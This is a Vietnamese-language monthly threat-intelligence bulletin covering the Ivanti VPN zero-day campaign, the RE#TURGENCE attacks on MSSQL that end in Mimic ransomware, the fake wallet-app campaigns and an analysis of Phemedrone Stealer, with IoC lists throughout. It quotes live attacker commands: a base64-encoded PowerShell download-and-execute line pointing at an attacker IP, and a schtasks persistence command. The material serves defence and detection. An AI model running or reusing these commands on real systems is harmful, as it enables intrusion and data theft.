THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT THÁNG 01 – 2024

Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết

1        Các mối đe dọa nâng cao – Advanced Threats

1.1      Chiến dịch tấn công lợi dụng 2 lỗ hổng Zero-day trên sản phẩm Ivanti Connect Secure VPN

Trong tuần thứ hai của tháng 12-2023, đội ngũ Volexity đã phát hiện 1 chiến dịch tấn công lợi dụng 2 lỗ hổng Zero-day trên sản phẩm Ivanti Connect Secure (ICS) VPN (trước đây là Pulse Connect Secure), bao gồm:

  • CVE-2023-46805 – lỗ hổng authentication-bypass với điểm CVSS 8.2
  • CVE-2024-21887 – lổ hổng command-injection được tìm thấy trong nhiều thành phần web của ICS VPN với điểm CVSS 9.1

Hai lỗ hổng trên khi kết hợp lại sẽ cho phép kẻ tấn công không cần xác thực thực thi các câu lệnh trên hệ thống (unauthenticated RCE). Trong sự cố được Volexity điều tra, kẻ tấn công đã khai thác các lỗ hổng này để đánh cắp dữ liệu cấu hình (configuration data), chỉnh sửa, download file, tiến hành tạo reverse tunnel từ các hệ thống ICS VPN. Đội ngũ xử lý sự cố cũng đã phát hiện hành vi sử dụng 1 file CGI hợp lệ của ICS VPN (compcheckresult.cgi) để làm backdoor thực thi câu lệnh, chỉnh sửa 1 file Javascript sử dụng bởi thành phần Web SSL VPN để tiến hành keylog và thu thập các thông tin đăng nhập của người dùng đăng nhập VPN.

Incident Investigation

Kết hợp cả phân tích dữ liệu bộ nhớ và kết quả kiểm tra của Integrity Checker Tool được cung cấp bởi Ivanti, đội ngũ Volexity đã phát hiện được các file độc hại trên các hệ thống ICS VPN bị xâm nhập:

Tên tệp tin và đường dẫn Mô tả
/home/perl/DSLogConfig.pm File bị sửa đổi với mục đích thực thi file sessionserver.pl
/home/etc/sql/dsserver/sessionserver.pl Tạo file sessionserver.sh và thực thi
/home/etc/sql/dsserver/sessionserver.sh Chỉnh sửa tệp tin compcheckresult.cgi để thêm một đoạn webshell
/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi Cho phép thực thi mã từ xa (do file đã thêm một phần code webshell)
/home/webserver/htdocs/dana-na/auth/lastauthserverused.js Thêm một đoạn mã vào file .js nhằm thu thập thông tin xác thực và gửi đến C2 https://symantke.com
/tmp/rev Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa
/tmp/s.py Tệp tin được phục hồi là PySoxy (https://github.com/MisterDaneel/pysoxy/blob/master/pysoxy.py), công cụ mã nguồn mở có sẵn trên github. Tệp tin được tạo và thực thi trong đường dẫn /tmp
/tmp/s.jar Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa
/tmp/b Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa
/tmp/kill Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa
visits.py Thay đổi nội dung trong file visits.py (một thành phần sẵn của Ivanti Connect Secure). Thêm các xử lý POST request khi người dùng truy cập đến /api/v1/cav/client/visits

 

Một số file khác tại đường dẫn /tmp/ được cho là đã được kẻ tấn công thực thi và xóa bỏ:

  • /tmp/rev
  • /tmp/s.py
  • /tmp/s.jar
  • /tmp/b
  • /tmp/kill

Malware, Tools, and Living off the Land

Bên cạnh việc tận dụng các công cụ có sẵn trên hệ thống bị xâm nhập, nhóm tấn công cũng đã triển khai 1 loạt các file mã độc và công cụ khác bao gồm các mẫu webshell, proxy, đồng thời thực hiện chỉnh sửa file để thu thập thông tin đăng nhập:

  • Sử dụng Task Manager để thực hiện dump bộ nhớ của tiến trình LSASS
  • Trích xuất file dit từ bản backup ổ cứng ảo của 1 máy chủ domain controller, sử dụng 7-zip để nén file
  • Sử dụng 1 script có trên Github để dump credentials từ Veeam backup software
  • Chỉnh sửa 1 file Javascript (js) được load bởi Web SSL VPN để thu thập thông tin đăng nhập khi người dùng truy cập VPN

Mẫu webshell thu thập được Volexity đặt tên GLASSTOKEN gồm 2 phiên bản triển khai trên các máy chủ có kết nối Internet và các máy chủ nội bộ:

  • Phiên bản 1 trên các máy chủ có kết nối Internet: gồm 2 chức năng chính dựa theo tham số trong request: chức năng tunnel dựa theo ReGeorg tunnel, chức năng thực thi câu lệnh dựa theo các tham số gửi từ request, đã decode hex và base64 sau đó truyền vào Load().
  • Phiên bản 2 trên các máy chủ nội bộ: chỉ có chức năng thực thi câu lệnh, code giống phiên bản 1.

Nhóm tấn công đứng đằng sau chiến dịch được cho là 1 nhóm mới, được Volexity đặt tên UTA0178 và cho rằng đến từ Trung Quốc.

Indicators of Compromise (IoCs)

Domains

gpoaccess[.]com

webb-institute[.]com

symantke[.]com

IP Addresses

206.189.208.156

75.145.243.85

47.207.9.89

98.160.48.170

173.220.106.166

73.128.178.221

50.243.177.161

50.213.208.89

64.24.179.210

75.145.224.109

50.215.39.49

71.127.149.194

173.53.43.7

1.2      Chiến dịch tấn công RE#TURGENCE nhắm đến các máy chủ MSSQL để triển khai MIMIC Ransomware

Đội ngũ Securonix Threat Research đã phát hiện 1 chiến dịch tấn công, được đặt tên RE#TURGENCE, nhắm đến các máy chủ MSSQL thuộc Mĩ, các quốc gia châu Âu và Mĩ Latin. Kết quả tấn công nhắm đến việc rao bán quyền truy cập đến các máy chủ này hoặc triển khai payload ransomware.

Initial Access (TA0001)

Nhóm tấn công thực hiện brute force mật khẩu quản trị để chiếm quyền truy cập đến các máy chủ và sử dụng xp_cmdshell để thực thi các câu lệnh

Execution (TA0002)

Nhóm tấn công thực thi câu lệnh Powershell từ tiến trình sqlservs.exe:

“C:\Windows\system32\cmd.exe” /c cmd /c powershell -exec bypass -w 1 -e

aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABv

AGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADgALgAyADEANAAuADIANgAuADMAOgAyADUAOAAyADMALwAxADgAOQBKAHQAJwApACkA

Câu lệnh tiến hành tải xuống 1 file (189jt) và thực thi nội dung file này thông qua Powershell invoke expression. Quá trình thực thi sẽ tiến hành tải xuống 1 payload Cobalt Strike đã được obfuscated và load vào trong tiến trình đang chạy sử dụng kĩ thuật in-memory reflection. Qua phân tích, Cobalt Strike beacon được xác định inject vào trong tiến trình SndVol.exe.

Nhóm tấn công còn tải xuống công cụ Anydesk (copy bộ cài đặt Anydesk vào C:\ad.exe), sử dụng file ad.bat để cài đặt Anydesk connector service, tạo 1 local user mới và gán user này vào nhóm administrators.

Persistence (TA0003)

Tài khoản local user “windows” được tạo với mật khẩu “denek1010”, và gán vào nhóm quản trị viên.

Credential Access (TA0006)

Mimikatz được tải xuống đường dẫn “c:\users\windows\desktop\x64\” và được sử dụng để thu thập credentials (lưu tại file Mimikatz_dump.txt)

Discovery (TA0102)

Công cụ Advanced Port Scanner được tải xuống qua Anydesk và lưu tại “c:\users\windows\documents\advport.exe”. Nhóm tấn công sử dụng công cụ này để thực hiện:

  • Kiểm tra domain controller remote shares
  • Thu thập hostname của Hyper-V VM sử dụng reg query “HKLM\Software\Microsoft\Virtual Machine\guest\parameters”
  • Kiểm tra kết nối exe đến DC
  • Chạy exe trên máy chủ DC sử dụng mật khẩu tài khoản domain admin thu được
  • Kiểm tra kết nối RDP đến DC
  • Kiểm tra remote shares trên các jumphosts
  • Kiểm tra và sử dụng kết nối RDP đến máy chủ decoy

Lateral Movement (TA0008)

Đội ngũ Securonix phát hiện nhóm tấn công di chuyển giữa các máy trong hệ thống mạng nạn nhân sử dụng psexec thuộc bộ công cụ Sysinternals và tài khoản domain admin thu được từ Mimikatz.

Impact (TA0105)

Sau khi thu thập đủ thông tin, nhóm tấn công tiến hành triển khai ransomware lên các máy chủ bị xâm nhập. Dropper red25.exe được tải xuống “c:\Users\windows\Documents\” qua Anydesk, giải nén và thực thi payload ransomware là file red.exe. Mẫu Mimic ransomware sử dụng bộ công cụ Everything by VoidTools để tìm kiếm và xác định các file mục tiêu để mã hóa.

Payload ransomware (red.exe) được thực thi với các câu lệnh:

  • “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e ul2
  • “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e ul1
  • “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e watch -pid 4164 -!

File ransome note được lưu tại C:\ —IMPORTANT—NOTICE—.txt.

MITRE ATT&CK

Tactic Technique
Initial Access T1110: Brute Force
Discovery T1046: Network Service Discovery
Defense Evasion T1112: Modify Registry
Persistence T1098: Account Manipulation

T1505.001: Server Software Component: SQL Stored Procedures

Credential Access T1003: OS Credential Dumping

T1110.001: Brute Force: Password Guessing

Command and Control T1105: Ingress Tool Transfer

T1572: Protocol Tunneling

T1573.001:  Encrypted Channel: Symmetric Cryptography

T1219: Remote Access Software

Impact T1486: Data Encrypted for Impact

 

Indicators of Compromise (IoCs)

C2

C2 Address Description Details
45.148.121[.]87 SMB Payloads (Cobalt Strike) Organization: ORG-SE92-RIPE

Org-name: SKB Enterprise B.V.

Country: NL

Address: Kingsfordweg 151, 1043 GR Amsterdam, Netherlands

88.214.26[.]3 PowerShell payloads (Cobalt Strike) Organization: ORG-FI54-RIPE

Org-name: FutureNow Incorporated

Address: National Cultural Centre 861 P.O. Box 1492, Victoria Mahe, Seychelles

seruvadessigen.3utilities[.]com Cobalt Strike beacon URL Registrar: Vitalwerks Internet Solutions, LLC / No-IP.com

 

File hashes

File Name SHA256
ad.bat 9F3AD476EDA128752A690BD26D7F9A67A8A4855A187619E74422CC08121AD3D3
ps1.ps1 A222BA1FD77A7915A61C8C7A0241222B4AD48DD1C243F3548CAEF23FE985E9C2
1ED02979B3F312C4B2FD1B9CFDFB6BEDE03CD964BB52B3DE017128FE00E10D3C
start.bat F328C143C24AFB2420964740789F409D2792413A5769A33741ED956FCE5ADD3E
Ar3.exe 1C7B82B084DA8B57FFEEF7BDCA955C2AA4A209A96EC70E8D13E67283C10C12A5
gui40.exe 31FEFF32D23728B39ED813C1E7DC5FE6A87DCD4D10AA995446A8C5EB5DA58615
advport.exe D0C1662CE239E4D288048C0E3324EC52962F6DDDA77DA0CB7AF9C1D9C2F1E2EB
red25.exe E9C63A5B466C286EA252F1B0AA7820396D00BE241FB554CF301C6CD7BA39C5E6
red.exe D6CD0080D401BE8A91A55B006795701680073DF8CD7A0B5BC54E314370549DC4

 

1.3      Chiến dịch tấn công tài chính nhắm đến người dùng Trung Quốc và các nước Đông Nam Á

Đội ngũ Antiy Mobile Threat Intelligence đã phát hiện 2 chiến dịch tấn công do cùng 1 nhóm đối tượng thực hiện với mục tiêu về tài chính và đánh cắp dữ liệu nhắm đến người dùng tại Trung Quốc, Việt Nam, Campuchia, Philippines và nhiều nước khác. Các cuộc tấn công được cho là bắt đầu từ tháng 04-2023 và kéo dài đến cuối tháng 09-2023, với số nạn nhân lên tới hơn 10000 người.

Trong chiến dịch tấn công đầu tiên, nhóm tấn công sử dụng 1 bộ công cụ được đóng gói giả mạo trình duyệt Google Chrome với các chức năng hoàn toàn tương tự. Khi người dùng sử dụng trình duyệt này để tải xuống 1 ứng dụng, công cụ này sẽ nhận diện và thay đổi đường dẫn URL để thực hiện tải xuống 1 ứng dụng khác mà người dùng không hề hay biết. Danh sách tải xuống từ địa chỉ IP và domain của nhóm tấn công gồm 13 ứng dụng là các ứng dụng cài đặt ví Web3 và các ứng dụng chat.

Category Application Name
Web3 wallet application imtoken
itoken
mathwallet
metamask
tokenpocket
tronlink
trust
Chat tool application whatsapp
letstalk
line
potato
skype
telegram

 

Mỗi ứng dụng đều được cài thêm các chức năng nhằm đánh cắp dữ liệu và các thông tin bảo mật của nạn nhân.

Kiểm tra địa chỉ IP được sử dụng bởi nhóm tấn công (96.9.211.158), đội ngũ phân tích phát hiện 1 lượng lớn dữ liệu về thông tin của các nạn nhân, gồm thông tin cá nhân, thông tin giao dịch, thẻ ngân hàng.

Trong chiến dịch tấn công thứ hai, nhóm tấn công sử dụng 1 ứng dụng hẹn hò lừa người dùng thực hiện các tasks trên ứng dụng và thu phí, đồng thời cũng thực hiện đánh cắp các thông tin cá nhân và tài chính của nạn nhân.

Indicators of Compromise (IoCs)

Hash 

0697d382b7f9da6639155fc6f56b19ba

a9883639aa3b407b53fc746ebc3f61c2

305147c064c6cad67ab44c2846f4fe2d

91d56a788b294fac74fcf7e2dc3ec3ce

38d04d093a5b9b83fa0a50979a737c68

f7741c704516d4eee0f50bf0c7fbd5d1

22689b095b531b30f5d24e5d772db29b

02ce97e1dde97835a50d32b78bbbd94e

a3fa220d6d6989a845d8f2254e549350

ae77c710d04b6279d4dbaa94480a81f7

a9549afc58399aeccd3ea64201dca2c6

d294b3b5572f690144443a1af9a69493

e1c618c24a226a6c1647e1f880aa73ba

Url

https://im-download.org/download/imtoken.apk

https://itoken-app.org/download/itoken.apk

https://mathwallet.la/download/mathwallet.apk

https://mm-down .net/download/metamask.apk

https://tokenpocket-down.org/download/tokenpocket.apk

https://tronlink-apps.net/download/tronlink.apk

https://trustwallet-download.net/download/ trust.apk

https://letstallk-apps.com/download/letstalk.apk

https://line-downloads.net/download/line.apk

https://potato-apk.net/download/potato.apk

https: //skyppe-download.com/download/skype.apk

https://te1egram-download.com/download/telegram.apk

https://ws-download.com/download/whatsapp.apk

C2

https://feijpic.com/api/ch/me

https://feijwrod.com/api/index/reqaddV2

https://16qbci.com/api/ClientMToken/RegainAppMtoken

https://qscgyj.com/api/index/

http://96.9.211.158:8082/Api/

2        Malware

2.1      Phân tích Phemedrone Stealer

Mẫu mã độc được triển khai thông qua việc khai thác lỗ hổng CVE-2023-36025 có tên Phemedrone, nhắm mục tiêu vào các trình duyệt web và dữ liệu từ ví tiền điện tử cũng như các ứng dụng nhắn tin như Telegram, Steam và Discord của người dùng. Phemedrone có các tính năng chụp ảnh màn hình và thu thập thông tin liên quan đến hệ thống bao gồm thông tin hardware (phần cứng), vị trí, hệ điều hành. Các dữ liệu của người dùng sau đó sẽ được gửi đến máy chủ C2 hoặc Telegram. Payload cuối mà mã độc sử dụng được viết bằng C# và được maintained thường xuyên trên GitHub.

CVE-2023-36025 là lỗ hổng ảnh hưởng đến Microsoft Windows Defender SmartScreen do không kiểm tra các tệp tin Internet Shorcut(.url), kẻ tấn công có thể lợi dụng lỗ hổng này bằng cách tạo các tệp .url, thực thi các script độc hại nhằm vượt qua (bypass) các cảnh báo và kiểm tra của Windows Defender SmartScreen.

Để triển khai Phemedrone Stealer, kẻ tấn công lưu trữ các file Internet Shortcut độc hại trên Discord hoặc các dịch vụ cloud như FileTransfer.io. Các tệp tin độc hai này thường được ngụy trang bằng cách sử dụng các công cụ rút ngắn URL như shorturl.at. Thông qua việc lừa người dùng mở tệp .url, lỗ hổng CVE-2023-36025 được kích hoạt, đồng thời tạo kết nối tới máy chủ C2 để tải xuống máy nạn nhân các tệp tin độc hại khác

Têp tin đươc tải xuống và thực thi có định dạng .cpl (control panel item), thực chất đây là một file DLL được thực thi thông qua tiến trình control.exe, một tiến trình hợp pháp của Windows Control Panel

Sau khi tệp tin .cpl được thực thi, nó sẽ gọi tới rundll32.exe để thực thi tệp DLL. DLL này là một loader có nhiệm vụ gọi tới Windows Powershell để tải xuống thêm file độc hại có tên DATA3.txt được lưu trữ trên nền tảng Github.

DATA3.txt là một loader được obfuscate nhằm che giấu nội dung và khiến khó khăn hơn trong quá trình phân tích. DATA3 có nhiệm vụ sử dụng Powershell để tải xuống một zip file ở cùng repo github, để file ở trạng thái ẩn sử dụng công cụ hợp pháp của Windows – attrib.exe

Bên trong file zip có 3 files:

  • exe: Tệp tin hợp pháp của Windows – Windows Fault Reporting.
  • dll: Tệp tin độc hại, sử dụng WerFaultSecure.exe để khởi chạy
  • pdf: Payload encryt sử dụng thuật toán RC4, được sử dụng cho các giai đoạn sau nhằm triển khai các mã độc khác.

Wer.dll, có nhiệm vụ giải mã và thực thi mã độc ở giai đoạn tiếp theo, persistence trên máy nạn nhân bằng cách tạo lập lịch. Wer.dll sử dụng nhiều kỹ thuật nhằm tránh sự phát hiện của các AV và làm khó khăn hơn trong quá trình phân tích, dịch ngược như API hashing hoặc mã hóa các chuỗi. Ngoài ra, DLL này được bảo vệ bởi VMProctect.

DLL này được thực thi thông qua kỹ thuật DLL sideloading, bằng cách tạo tệp DLL giả mạo nằm cùng trong thư mục của ứng dụng. WerFaultSecure.exe sẽ thực hiện load wer.dll và gọi tới hàm WerpSetExitListeners. Như đã đề cập ở trên, loader sử dụng API Hashing, các hash tương tứng với các hàm APT và thư viện như ở bảng sau:

998B531E KERNEL32.DLL
46DED02D GetModuleHandleExW
0FC6B42F1 GetModuleFileNameW
0C97C1FFF GetProcAddress
3FC1BD8D LoadLibraryA
0F29DDD0C lstrcatW
759903FC CreateDirectoryW
0A1EFE929 CreateFileW
0A7FB4165 GetFileSize
8B35A289 LocalAlloc
95C03D0 ReadFile
0B09315F4 CloseHandle
0B1866570 GetModuleHandleA
0F54D69C8 CopyFileW

 

Đối với các chuỗi, loader sử dụng thuật toán XOR, với mỗi một byte, thuật toán sẽ sinh ra một khóa duy nhất trong buffer, tuân theo công thức (characterIndex % <num1> + <num2>). Mỗi chuỗi được mã hóa có chức năng giải mã riêng với các giá trị <num1><num2> là duy nhất, khiến cho việc giải mã trở nên khó khăn hơn. Giải mã thu được các chuỗi như sau:

“/F /CREATE /TN “Licensing2” /tr “C:\Users\Public\Libraries\Books\WerFaultSecure.exe” /sc minute /MO 90″

\\secure.pdf

\\wer.dll

\\WerFaultSecure.exe

Activeds.dll

advapi32

AllocADsMem

C:\\Users\\Public\\Libraries\\Books\\secure.pdf

C:\\Users\\Public\\Libraries\\Books\\wer.dll

C:\\Users\\Public\\Libraries\\Books\\WerFaultSecure.exe

C:\Windows\explorer.exe

C:\Windows\System32\schtasks.exe

CreateProcessW

CryptCATCDFOpen

kernel32.dll

PathRemoveFileSpecW

ReallocADsMem

Shlwapi.dll

SystemFunction032

Wintrust.dll

Loader thưc hiện persistence bằng cách tạo đường dẫn “C:\Users\Public\Libraries\Books”, sao chép các file wer.dll, secure.pdf, and WerFaultSecure.exe từ thư mục hiện tại mà loader đang thực thi sang thư mục “C:\Users\Public\Libraries\Books”. Thực hiện câu lệnh “schtasks.exe “/F /CREATE /TN \”Licensing2\” /tr \”C:\\Users\\Public\\Libraries\\Books\\WerFaultSecure.exe\” /sc minute /MO 90″”.

Sau quá trình tạo persistence, mã độc thực hiện giải mã nội dung trong file safe.pdf theo thuật toán RC4, dùng các hàm AllocADsMem và ReallocADsMem từ thư viện Activeds.dll nhằm cấp phát bộ nhớ và ghi nội dung đã giải mã, gọi hàm VirtualProtect để sửa đổi phân vùng thành quyền Executable-Read-Write.

Mã độc sử dụng các hàm API callback để chuyển luồng thực thi, bằng cách gọi tới hàm CryptCATCDFOpen (hàm được sử dụng để xử lý cryptographic catalog files trong Windows), hàm này nhận 2 tham số: pwszFilePath và callback function – PFN_CDF_PARSE_ERROR_CALLBACK, ở đây callback function sẽ nhận EP của shellcode. Khi hàm CryptCATCDFOpen được gọi, callback function cũng sẽ được gọi, từ đó mã độc được thực thi

Sau quá trình thực thi shellcode, shellcode này được public trên Internet có tên Donut, một shellcode mã nguồn mở cho phép thực thi VBScript, JScript, EXE files, DLL files, and .NET assemblies trong bộ nhớ.  Donut có thể nén các file sử dụng aPLib, LZNT1, Xpress, và Xpress Huffman sử dụng hàm RtlCompressBuffer, mã hóa payload sử dụng mã hóa Chaskey. Đối với mẫu mã độc này, Donut được nhúng trực tiếp vào loader, không sử dụng các cách nén file mà chỉ mã hóa thông thường. Với payload cuối cùng, Donut được cấu hình để load Common Language Runtime (CLR), khi CLR được load thành công vào trong tiến trình, Application Domain được tạo cho phép chạy assemblies, Donut load .NET assembly và gọi tới entry point của payload

Phân tích Phemedrone payload

Đánh cắp thông tin xác thực

Khi được thực thi, mã độc khởi tạo các cấu hình và giải mã một số thông tin như Telegram API token, chat ID, and Email_To mutex (được sử dụng để đồng bộ hóa) sử dụng thuật toán mã hóa đối xứng RijndaelManaged với key mã hóa cùng giá trị salt được định nghĩa trong code. Quá trình giải mã bao gồm loại bỏ “CRYPTED:” khỏi chuỗi, decoded base 64 và chuyên vào mảng byte, giải mã với thuật toán đã mô tả bên trên để thu được bản rõ (cleartext)

Mã độc sử dụng “MutexCheck.Check()” method để kiểm tra và đảm bảo chỉ có một mã độc được thực thi trên máy nạn nhân. Nếu có phiên bản khác đang hoạt động, chương trình sẽ tự động ngắt ngay lập tức, sau khi giải mã, mutex có giá trị như sau: 5dad16bd-6884-4ab8-b182-a504b4c99bcf

Phần mềm độc hại nhắm tới các ứng dụng và dịch vụ trên máy nạn nhân, tùy từng trường hợp, các thông tin nhạy cảm sau sẽ được trích xuất:

Các trình duyệt có base là nhân Chromium:  Mã độc thu thập dữ liệu, bao gồm mật khẩu, cookie và thông tin lưu trữ trong các ứng dụng như LastPass, KeePass, NordPass, Google Authenticator, Duo Mobile và Microsoft Authenticator, cùng nhiều ứng dụng khác.

Ví điện tử: trích xuất các file từ các ứng dụng ví tiền điện tử khác nhau như Armory, Atomic, Bytecoin, Coninomi, Jaxx, Electrum, Exodus và Guarda

Discord: Mã độc trích xuất authentication tokens từ úng dụng Discord, giúp kẻ tấn công truy cập trái phép vào tài khoản của người dùng

FileGrabber: Mã độc sử dụng dịch vụ này để thu thập các files từ người dùng từ các thư mục được chỉ định như Document và Desktop

FileZilla: Thu thập thông tin kết nối và thông tin xác thực.

Gecko: Mã độc nhắm mục tiêu vào các trình duyệt có base là Gecko để thu thập dữ liệu người dùng.

System Information: Thu thập thông tin chi tiết về hệ thống, bao gồm thông số phần cứng, vị trí địa lý và thông tin hệ điều hành cũng như chụp ảnh màn hình

Steam: Truy cập các tập tin liên quan đến nền tảng Steam

Telegram: Thu thập dữ liệu người dùng từ thư mục cài đặt, nhắm tới các tệp liên quan đến xác thực trong thư mục “tdata”, Các tệp tin này được tìm kiếm dựa trên kích thước và kiểu đặt tên

Sau quá trình này, mã độc sử dụng MemoryStream và ZipStorage để xử lý và nén các thông tin này. MemoryStream được sử dụng để lưu trữ dữ liệu tạm thời trong buffer, cho phép xử lý thông tin nhanh chóng và hiệu quả mà không cần thao tác I/O trên đĩa. Sau đó, ZipStorage được sử dụng để nén dữ liệu thành định dạng tệp ZIP trực tiếp trong MemoryStream.

Trước khi đánh cắp dữ liệu, mã độc sẽ sẽ kiểm tra lại Telegram API token thông qua method TokenIsValid. Nếu phản hồi nhận lại được bắt đầu bằng {“ok”:true thì API token được coi như hợp lệ. Nếu API Token không hợp lệ, exception sẽ sinh ra và lưu lại sau đó return false gọi tới Environment.Exit(0) để ngắt process.

Sau quá trình kiểm tra Telegram API Token, mã độc sẽ gửi đa dạng các thông tin cho kẻ tấn công thông qua method SendMessage trong class global::Telegram.Telegram

Ví dụ về report tóm tắt do Phemedrone Stealer tạo ra, thể hiện chi tiết các dữ liệu đã đánh cắp. Báo cáo bao gồm thông tin chính về hệ thống của nạn nhân và dữ liệu người dùng như vị trí địa lý, thông số phần cứng (hardware), thống kê dữ liệu web và các tính năng bảo mật của hệ thống.

Quá trình tiếp theo là đánh cắp các file đã được xử lý ở định dạng ZIP – lưu trữ đầy đủ các dữ liệu thông qua SendZip method, sử dụng HTTP POST request để giao tiếp với Telegram API, được gửi dưới dạng document. SendZip and MakeFormRequest2 method có nhiệm vụ xây dựng các request, nhằm đảm bảo các header và file data trong stream là chính xác. Request sẽ được gửi tới sendDocument API endpoint sử dụng bot token và chat ID, bao gồm cả việc xử lý và gửi lại khi phát sinh lỗi, đảm bảo tệp tin được tải lên thành công.

Indicators of Compromise (IoCs)

SHA256

f32964087462ba3c96a87ee8387f89de8fa605f2f5bb84cb5f754cd736683f2d

5f1a027f1c1468f93671a4c7fc7b5da00a3c559a9116f5417baa6c1f89550d9f

c6765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66

a841cd16062702462fdffdd7eef9fc3d88cde65d19c8d5a384e33066d65f9424

815b2125d6f0a5d99750614731aaad2c6936a1dc107a969408a88973f35064c0

ccd19ef6e81e936fc944ebafaefd2ad99ccd11dd15fbc7d3460726bb38237595

ea9b0dee3b7583ce60bba277e2189acb660284abf6b3b9273b6a60c85b0a5ce3

9a96406ae06b703d827fffd1f1ced0781f89ca2af6d5041721e9fbd2647c8430

22236e50b5f700f5606788dcd5ab1fb69ee092e8dffdd783ac3cab47f1f445ab

1433efd142007ce809aff5b057810f5a1919ea1e3ff740ff0fcc2fc729226be5

ad513d2cba6cc82a50ee6531b275e937480d8fee20af2b4f41da5f88e408a4e9

7c0a1e11610805bd187ef6e395c8fa31c1ae756962e26cdbff704ce54b9e678a

4ae28a44c38edc516e449ddd269b5aa9924d549d763773dcd312b48fe6bb91ab

c9743e7ffb6f6978f08f86e970ddb82e24920d266b32bd242254fbf51abfe6ce

c3bfaa1f52abdbb673d83af67090112dfdfe9ea8ff7a613f62bd48bace205f75

6bd8449de1e1bdd62a86284ed17266949654f758e00e10d8cd59ec4d233c32e5

4446d5b475ce8aed5244da917ae42b6cb9744ffc4efd766af8e4dee7dd5a3e19

70c23213096457df852b66443d9a632e66816e023fdf05a93b9087ffb753d916

69941417f26c207f7cbbbe36ce8b4d976640a3d7f407d316932428e427f1980b

e2d19a23b19a07d35d16990e78c5cfaa3dd97b9ce92201f4db18a7da95fe6ff8

b7f53c507a1aa4254b66a883285e27b42d65ea4ea4206fe674e0d03738f52141

4ae28a44c38edc516e449ddd269b5aa9924d549d763773dcd312b48fe6bb91ab

c6765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66

f24a8b3144e89b9bececfbf76add87ddefbd19a024a85692026e97f3a9911902

e64b185c149cb523d13cb46ea3911e2c0595b6f10ae86e6a14b15e8d45c0cdcb

cb58bf466675be9e11cfb404503cb122514f47b9708d033e381f28a60535812c

80f88566fda41ebc1b4e35d89748a804740bba0d03049c33c536cffd5e0491e2

4a36cc607ca5c2acc536510fd1b0ddd43a9403dac168d2420d474611909ed9e6

89caa1568fcff162086dae91e6bd34fd04facba50166ebff800d45a999d0be8b

188c72f995ebd5e1e8d0e3b9d34eeeec2ec95d4d0fee30d2ea0f317ab1596eef

e326c1b9e61cca6823300158e55381c6951b09d2327a89a8d841539cad3b4df3

4da33c7fe62f71962913d7b40ff76aff9f1586e57db707b3d6b88162c051f402

ff44e502bd5ea36e17b3fc39b480e65971b36002f27fb441e4acadd6bf604a20

b7980f64f892d70b1cd72a8c80f8319f50c3c410aba4e4bc63fd6494bcb4f313

480fae3bdc2604cba846779dd7dced95b3ce036bdef629ded247771a2e4d5d58

348aea633c99e5f6a0ac7b850961be0a145a35678e5bd074b4852f7a2419f518

1c53dffcb4c474a2b08708609466e7d234d6d51139b6532af54fac5bb8d37415

b37ec923451dd15a0f68df0b392b0f1b243fe50c709de9e574ac14cf6fabdd53

f2814a4b3796fb44045c33b9d0d9972bf40478e5bc74b587486900c6cfa02f3d

5f1a027f1c1468f93671a4c7fc7b5da00a3c559a9116f5417baa6c1f89550d9f

8b73d7aa8bb8db8a9ecbf9f713934fbbb5caf4745d7a61a6f34a100c4d84fd9d

9b9ba722b314febfc44919551a03dde1539f115333183c2cb5e74b8e644ba5b3

568b4b868b225f06bb34da0dc23603c9dedccc2b319353407c814983d5322563

5ecad303475e180f8879871d8571d1a7eeb99e0b3c63cc77fdd02cb9b8c51211

d5b1214f1817a16b2bc8a76daa48c9a3c5af0e411cf4f0c17b0e364d437a454b

5f0ff1fd6ca89a0ddd3178e023dea8f79ff3c3f3d8ff7900378eb014e83ed326

40c6fa38e44e00d8cf113d0a079cd46f8b7654331f12e50d2af5a9f1ddc6d266

3a34cd3a3221d83a1cca8913b2afbb5b780027d48b44d3ce15dfe4a402064871

URLs

hxxps[://]raw[.]githubusercontent[.]com/nateeintanan2527/Joyce_Data/main/DATA3[.]txt

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1175808264479449138/DocuSign3[.]url?ex=656c93c7&is=655a1ec7&hm=6e8b316f2112cfaf27bc8cf35089098e4a0f2d16054e8d199c13588c31b2e383&

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1177255995156742144/DocuSign4[.]url?ex=6571d815&is=655f6315&hm=f9e208714ffc862f97cb6363fb887f11fda0020802a020a56a571c4195114854&

hxxps[://]shorturl[.]at/ixEZ7

file[://]51[.]79[.]185[.]145/pdf/data4[.]zip/pdf4[.]cpl

hxxp[://]51[.]79[.]185[.]145/pdf/kay[.]zip/kay[.]cpl

hxxp[://]51[.]79[.]185[.]145/pdf/data2[.]zip/pdf2[.]cpl

hxxp[://]51[.]79[.]185[.]145/pdf/

hxxps[://]shorturl[.]at/flEK5

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1167767477921513512/SecureDocuSign_pdf[.]url?ex=654f5336&is=653cde36&hm=08ea24126262ff865a1ab0c79f20e41e9e53896d9cda8e0c374c077f5a500b00&

hxxps[://]shorturl[.]at/vzAD2

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627585105997854/DocuSign2[.]url?ex=6559bae5&is=654745e5&hm=ab8a5d275414768c20bd9a8a0e434c4b8fe7c0bd8006c3b5f69cc80b7fe57cb1&

hxxps[://]shorturl[.]at/bsuCR

hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627584627855481/DocuSign1[.]url

